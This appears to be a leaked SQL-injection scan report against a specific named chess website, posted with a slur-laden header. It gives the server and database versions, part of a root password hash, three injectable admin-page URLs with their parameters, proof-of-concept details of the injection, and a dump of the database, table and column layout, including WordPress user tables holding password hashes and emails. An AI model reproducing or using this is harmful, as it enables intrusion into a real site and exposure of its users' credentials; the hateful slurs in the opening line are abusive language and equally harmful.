http://xqfan.com/

1. http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
2. Version 5.5.38-0ubuntu0.12.04.1
3. Server Apache/2.2.22 (Ubuntu)
4. OS debian-linux-gnu
5. user root@localhost
6. Database xqfan
7. half of* root_PasswordHash *317E9221C707F3F74E0B9CAA6AEB40AA63521E48
8. ----------------------------------------------------------------------------------
9.  
10. Vulnerability Result
11.  
12. No. 1
13. ReferURL http://xqfan.com/vn/admin1.php?id=622
14. Parameter id=622
15. Type Integer
16. KWordActionURL Hướng
17. Vulnerability URL SQL INJECTION
18. ----------------------------------------------------------------------------------
19.  
20. No. 2
21. ReferURL http://xqfan.com/vn/admin1.php?id=99999999
22. Parameter id=99999999
23. Type Integer
24. KWordActionURL thuật
25. Vulnerability URL SQL INJECTION
26. ----------------------------------------------------------------------------------
27.  
28. No. 3
29. ReferURL http://xqfan.com/vn/admin1.php?id=
30. Parameter id=
31. Type Search
32. KWordActionURL ChessFriends
33. Vulnerability URL SQL INJECTION
34. ----------------------------------------------------------------------------------
35.  
36. Proof Of Concept - SQL INJECTION
37.  
38. Parameter Value
39. URL http://xqfan.com/vn/admin1.php?id=622
40. RequestType GET
41. DatabaseType MySQL
42. InjectionType Integer
43. GettingDataBy FieldEcho
44. ----------------------------------------------------------------------------------
45.  
46. Proof Of Concept - Getting Database Structure
47.  
48. DB-----Table---Column
49. mysql
50. db
51. Db
52. Host
53. Insert_priv
54. Update_priv
55. User
56. Grant_priv
57. Index_priv
58. Drop_priv
59. Event_priv
60. Create_priv
61. Delete_priv
62. Create_tmp_table_priv
63. Alter_priv
64. Create_view_priv
65. Show_view_priv
66. Select_priv
67. Execute_priv
68. Alter_routine_priv
69. Create_routine_priv
70. Trigger_priv
71. Lock_tables_priv
72. References_priv
73. help_category
74. help_keyword
75. proc
76. servers
77. event
78. proxies_priv
79. slow_log
80. plugin
81. columns_priv
82. procs_priv
83. general_log
84. ndb_binlog_index
85. func
86. time_zone
87. help_topic
88. time_zone_transition
89. host
90. user
91. time_zone_leap_second
92. tables_priv
93. Db
94. Grantor
95. Table_name
96. Column_priv
97. Host
98. Table_priv
99. User
100. Timestamp
101. help_relation
102. time_zone_name
103. time_zone_transition_type
104. db
105. func
106. event
107. help_topic
108. proc
109. servers
110. procs_priv
111. host
112. ndb_binlog_index
113. help_keyword
114. slow_log
115. user
116. help_category
117. general_log
118. columns_priv
119. help_relation
120. tables_priv
121. plugin
122. proxies_priv
123. time_zone_name
124. time_zone
125. time_zone_leap_second
126. time_zone_transition
127. time_zone_transition_type
128. nctg
129. xqfan
130. phpmyadmin
131. pma_relation
132. pma_history
133. pma_pdf_pages
134. pma_bookmark
135. pma_table_coords
136. pma_column_info
137. pma_tracking
138. pma_designer_coords
139. pma_table_info
140. pma_userconfig
141. pma_tracking
142. pma_designer_coords
143. pma_pdf_pages
144. pma_column_info
145. pma_userconfig
146. pma_relation
147. pma_bookmark
148. pma_table_coords
149. pma_history
150. pma_table_info
151. wordpress
152. nctgforums
153. softgaroo
154. xqsun
155. wp_comments
156. wp_terms
157. wp_links
158. wp_posts
159. wp_users
160. ID
161. user_login
162. user_url
163. user_activation_key
164. user_status
165. user_nicename
166. user_email
167. display_name
168. user_pass
169. user_registered
170. wp_commentmeta
171. wp_options
172. wp_postmeta
173. wp_usermeta
174. wp_term_taxonomy
175. wp_term_relationships
176. information_schema
177. performance_schema